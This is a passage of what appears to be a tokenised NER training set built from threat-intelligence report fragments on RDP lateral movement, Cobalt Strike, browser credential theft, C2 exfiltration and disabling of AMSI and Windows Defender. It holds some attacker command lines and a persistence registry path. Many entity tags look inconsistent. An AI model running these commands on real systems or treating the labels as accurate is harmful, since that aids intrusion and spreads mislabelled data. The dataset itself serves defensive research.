"O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "From", - "there,", - "the", - "threat", - "actors", - "began", - "connecting", - "to", - "other", - "hosts", - "via", - "RDP,", - "including", - "the", - "a", - "backup", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "did", - "RDP", - "to", - "a", - "few", - "other", - "servers" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "traces", - "of", - "RDP", - "(Remote", - "Desktop", - "Protocol)", - "connections", - "were", - "discovered", - "on", - "multiple", - "compromised", - "hosts", - "utilized", - "for", - "lateral", - "movement" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "started", - "by", - "connecting", - "to", - "a", - "new", - "server", - "via", - "RDP" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Once", - "establishing", - "the", - "RDP", - "connection,", - "they", - "deployed", - "Powertool64.exe," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-HackOrg", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "kept", - "the", - "remote", - "desktop", - "session", - "alive" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "execute", - "encoded", - "scripts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "will", - "decode", - "itself" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decoded", - "base", - "64", - "content" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "a", - "Base64", - "encoded", - "script", - "with", - "various", - "components", - "split", - "into", - "different", - "variables", - "for", - "obfuscation", - "purposes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "A", - "service", - "was", - "also", - "created", - "for", - "the", - "agent." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "service", - "was", - "installed", - "in", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "svcService", - "Type:", - "user", - "mode", - "serviceService", - "Start", - "Type:", - "auto", - "startService", - "Account:", - "LocalSystem" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "separate", - "service", - "was", - "created", - "for", - "that", - "agent." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "service", - "was", - "installed", - "in", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "service", - "was", - "installed", - "in", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Service", - "Type:", - "user", - "mode", - "serviceService", - "Start", - "Type:", - "auto", - "startService", - "Account:", - "LocalSystem" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "was", - "observed", - "creating", - "remote", - "services" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "occurred", - "from", - "rundll32.exe,", - "which", - "was", - "previously", - "used", - "to", - "execute", - "and", - "run", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\cmd.exe", - "/c", - "rundll32.exe", - "C:\\ProgramData\\x86.dll,", - "StartA" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "delete", - "its", - "process", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delete", - "the", - "driver", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "removing", - "files", - "from", - "the", - "system." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "was", - "observed", - "deleting", - "files", - "that", - "had", - "been", - "dropped", - "to", - "disk" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "whoami", - "/groups" - ], - "ner_tags": [ - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "was", - "observed", - "creating", - "remote", - "services", - "in", - "order", - "to", - "execute", - "beacon", - "DLL", - "files" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "began", - "to", - "review", - "sensitive", - "documents" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Both", - "HTTP", - "and", - "HTTPS", - "were", - "observed", - "to", - "be", - "used." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Infected", - "email", - "attachments" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtaining", - "relevant", - "device", - "data,", - "such", - "as", - "OS", - "version", - "and", - "architecture,", - "hardware", - "ID,", - "CPU,", - "RAM,", - "screen", - "resolution,", - "system", - "language,", - "etc." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collects", - "information,", - "primarily", - "system", - "information" - ], - "ner_tags": [ - "I-Features", - "O", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "can", - "take", - "away", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrate", - "files", - "and", - "extract", - "data", - "from", - "specific", - "applications." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "acquire", - "browsing", - "histories,", - "Internet", - "cookies,", - "usernames/passwords,", - "personally", - "identifiable", - "details,", - "credit", - "card", - "numbers,", - "and", - "other", - "highly", - "sensitive", - "information", - "from", - "browsers." - ], - "ner_tags": [ - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "target", - "stored", - "browser", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collects", - "sensitive", - "information", - "from", - "the", - "victim’s", - "machine" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collects", - "cookie", - "information,", - "search", - "histories,", - "and", - "key", - "inputs", - "from", - "browsers" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "inside", - "of", - "the", - "“Web", - "Data”", - "SQLite", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sensitive", - "data", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "usernames/passwords," - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "include", - "saved", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "run", - "under", - "the", - "name", - "“tmp.exe”", - "by", - "unpacking", - "itself", - "to", - "the", - "“C:\\Users\\admin\\AppData\\Local\\Temp\\”", - "file", - "path." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Registry", - "Key", - "Sets" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "transmits", - "information", - "as", - "a", - "zip", - "file" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "this", - "information", - "to", - "its", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C2", - "is", - "transmitted", - "as", - "a", - "zip", - "file", - "during", - "the", - "POST", - "request." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "transferred", - "to", - "the", - "C2", - "server", - "as", - "a", - "zip", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "transfers", - "them", - "to", - "the", - "C2", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "many", - "obfuscated", - "strings", - "that", - "are", - "being", - "covered", - "by", - "a", - "random", - "string,", - "“edx765“,", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "information," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "passes", - "the", - "obfuscated", - "string", - "to", - "a", - "function", - "that", - "strips", - "the", - "arbitrary", - "string", - "and", - "delivers", - "the", - "original", - "string" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passes", - "the", - "obfuscated", - "string", - "to", - "a", - "function", - "that", - "strips", - "the", - "arbitrary", - "string", - "and", - "delivers", - "the", - "original", - "string." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Making", - "a", - "‘POST’", - "request," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "multiple", - "POST", - "requests", - "to", - "the", - "“c2/sock”", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "accessed", - "C2", - "while", - "visiting", - "port", - "80" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "are", - "instructed", - "to", - "click", - "“Confirm”", - "to", - "view", - "a", - "message", - "from", - "“Express.”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "user", - "is", - "also", - "asked", - "to", - "permit", - "push", - "notifications", - "in", - "the", - "browser," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "decrypted,", - "the", - "configuration", - "file", - "reveals", - "several", - "parameters," - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "exclusion", - "list" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "using", - "the", - "RC4", - "algorithm", - "with", - "a", - "hard-coded", - "key", - "in", - "the", - "resource." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "send", - "the", - "decryption", - "program" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "decrypted" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "using", - "the", - "RC4", - "algorithm", - "with", - "a", - "hardcoded", - "key", - "in", - "the", - "resource." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "hardcoded", - "key", - "to", - "decrypt", - "the", - "configuration", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "to", - "decrypt", - "the", - "configuration", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get", - "configuration", - "file", - "and", - "decrypt", - "it" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryptor", - "download" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryptor", - "is", - "delivered", - "in", - "a", - "zip", - "archive", - "containing", - "the", - "decryptor", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decryptor", - "to", - "clean", - "up", - "their", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "At", - "the", - "end", - "of", - "the", - "decryption", - "process,", - "the", - "program", - "indicates", - "the", - "number", - "of", - "decrypted", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryptor", - "has", - "finished", - "the", - "decryption", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryptor", - "execution" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryptor", - "program", - "appears", - "unique", - "and", - "is", - "linked", - "to", - "one", - "victim", - "specifically.", - "In", - "our", - "example,", - "it", - "only", - "decrypts", - "the", - "files" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "one", - "to", - "get", - "information", - "about", - "the", - "machine,", - "such", - "as", - "the", - "operating", - "system", - "version," - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "one", - "to", - "get", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reflective", - "DLL", - "loading,", - "to", - "inject", - "a", - "DLL", - "from", - "memory." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "Windows", - "API", - "functions", - "to", - "inject", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "a", - "regular", - "Bitmap", - "(open", - "matrix", - "image", - "format", - "used", - "by", - "Windows)", - "that", - "can", - "be", - "used", - "by", - "malware", - "to", - "execute", - "code", - "or", - "as", - "a", - "payload", - "dropper" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "image’s", - "pixels", - "are", - "an", - "actual", - "binary", - "representation", - "of", - "the", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "process", - "can", - "be", - "summarized", - "as", - "Exe", - "->", - "Resources", - "->", - "BMP", - "with", - "embedded", - "data", - "in", - "pixels", - "fetched" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "unpacked", - "malware" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "configuration", - "file", - "encrypted." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "Script", - "uses", - "Base64", - "and", - "hexadecimal", - "encoding", - "and", - "XOR-encryption" - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - ".", - "The", - "malware", - "will", - "try", - "first", - "to", - "write", - "in", - "the", - "registry-hive", - "“HKEY_LOCAL_MACHINE”", - "but", - "if", - "it", - "cannot", - "create", - "it,", - "it", - "will", - "use", - "the", - "registry-hive", - "“HKEY_CURRENT_USER”:" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Write", - "in", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "the", - "writing", - "in", - "the", - "registry", - "has", - "been", - "completed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "write", - "in", - "the", - "registry", - "information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Create", - "its", - "own", - "registry", - "key", - "in", - "\\SOFTWARE\\<uniquename>" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "functions", - "“SHGetFolderPathlW”", - "and", - "“CreateFileW”" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "with", - "the", - "function", - "“WriteFile”." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "Windows", - "API", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "script", - "will", - "delete", - "the", - "malware", - "sample", - "with", - "its", - "path", - "using", - "the", - "command", - "“del”", - "and", - "finally", - "delete", - "the", - "bat", - "file", - "with", - "the", - "command", - "“del", - "%0%”." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "uses", - "the", - "“del”", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "tries", - "to", - "remove", - "itself", - "from", - "the", - "machine", - "to", - "avoid", - "being", - "detected", - "and", - "analyzed", - "by", - "security", - "researchers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "the", - "ransom", - "note" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "download", - "is", - "done", - "directly", - "from", - "the", - "NetWalker", - "Tor", - "site" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "will", - "be", - "able", - "to", - "download", - "the", - "decryptor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Place", - "a", - "value", - "on", - "RunOnce", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "performing", - "password", - "spray," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Activity", - "from", - "a", - "password-spray", - "associated", - "IP", - "address." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "IP", - "address", - "that", - "had", - "been", - "identified", - "as", - "participating", - "in", - "password", - "spray" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "credential", - "stuffing", - "attacks" - ], - "ner_tags": [ - "B-Org", - "I-OffAct", - "I-OffAct" - ] - }, - { - "tokens": [ - "is", - "distributed", - "through", - "exposed", - "Remote", - "Desktop", - "Protocol", - "(RDP)", - "setups" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "a", - "heavy", - "emphasis", - "on", - "Remote", - "Desktop", - "Protocols." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "by", - "brute-forcing", - "them" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "other", - "known", - "vulnerabilities", - "for", - "initial", - "access,", - "i.e.", - "vulnerabilities", - "in", - "Citrix", - "gateway", - "devices" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "other", - "tools", - "to", - "gather", - "credentials", - "that", - "include", - "Mimikatz,", - "LaZagne,", - "and", - "NirSoft’s", - "NetPass." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "It", - "uses", - "bat", - "files" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "batch", - "file", - "to", - "stop", - "services" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "stolen", - "credentials", - "are", - "used", - "to", - "reach", - "high-value", - "machines", - "like", - "servers" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WMIC", - "/node" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "reg", - "add", - "HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "makes", - "use", - "of", - "API", - "GetTickCount", - "/", - "QueryPerformanceCounter" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "help", - "of", - "ShellExecute", - "API" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delete", - "itself", - "from", - "the", - "target", - "systems", - "after", - "infection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "also", - "drops", - "and", - "installs" - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "sets", - "the", - "following", - "registry", - "entry", - "to", - "open", - "the", - "downloaded", - "PDF", - "file", - "every", - "time", - "the", - "computer", - "boots" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iXqrVo" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "adding", - "the", - "HIDDEN", - "file", - "attribute" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "adds", - "the", - "HIDDEN", - "file", - "attribute", - "to", - "the", - "file:" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "taking", - "command", - "line", - "arguments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "command", - "line", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "and", - "execute", - "a", - "remote", - "“note.hta”:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "to", - "download", - "another", - "remote", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "download", - "and", - "execution" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "PowerShell", - "to", - "pull", - "and", - "run" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloading", - "and", - "executing" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "and", - "runs" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "and", - "executes" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "and", - "executes" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "and", - "executes" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "and", - "executes" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "and", - "executes" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "download", - "of", - "wed.hta" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "disables", - "AMSI", - "by", - "hijacking", - "the", - "COM", - "server,", - "changing", - "it", - "from", - "\"%windir%\\system32\\amsi.dll\"", - "to", - "\"C:\\IDontExist.dll\"." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "performs", - "the", - "following", - "actions", - "to", - "alter", - "Windows", - "Defender", - "settings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adds", - "the", - "following", - "exclusions", - "to", - "Windows", - "DefenderExtensions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Allows", - "known", - "Windows", - "Defender", - "Threat", - "IDs", - "to", - "execute" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "I-SecTeam", - "O", - "O" - ] - }, - { - "tokens": [ - "Disables", - "Windows", - "Defender", - "Attack", - "Surface", - "Reduction", - "(ASR)", - "rules" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disables", - "the", - "following", - "Windows", - "Defender", - "features:Intrusion", - "Prevention", - "System", - "IO", - "AV", - "Protection", - "(does", - "not", - "scan", - "downloaded", - "files", - "and", - "attachments)", - "Realtime", - "monitoring", - "Script", - "scanning", - "Controlled", - "folder", - "access", - "protection", - "PUA", - "protection", - "Scheduled", - "scan" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - 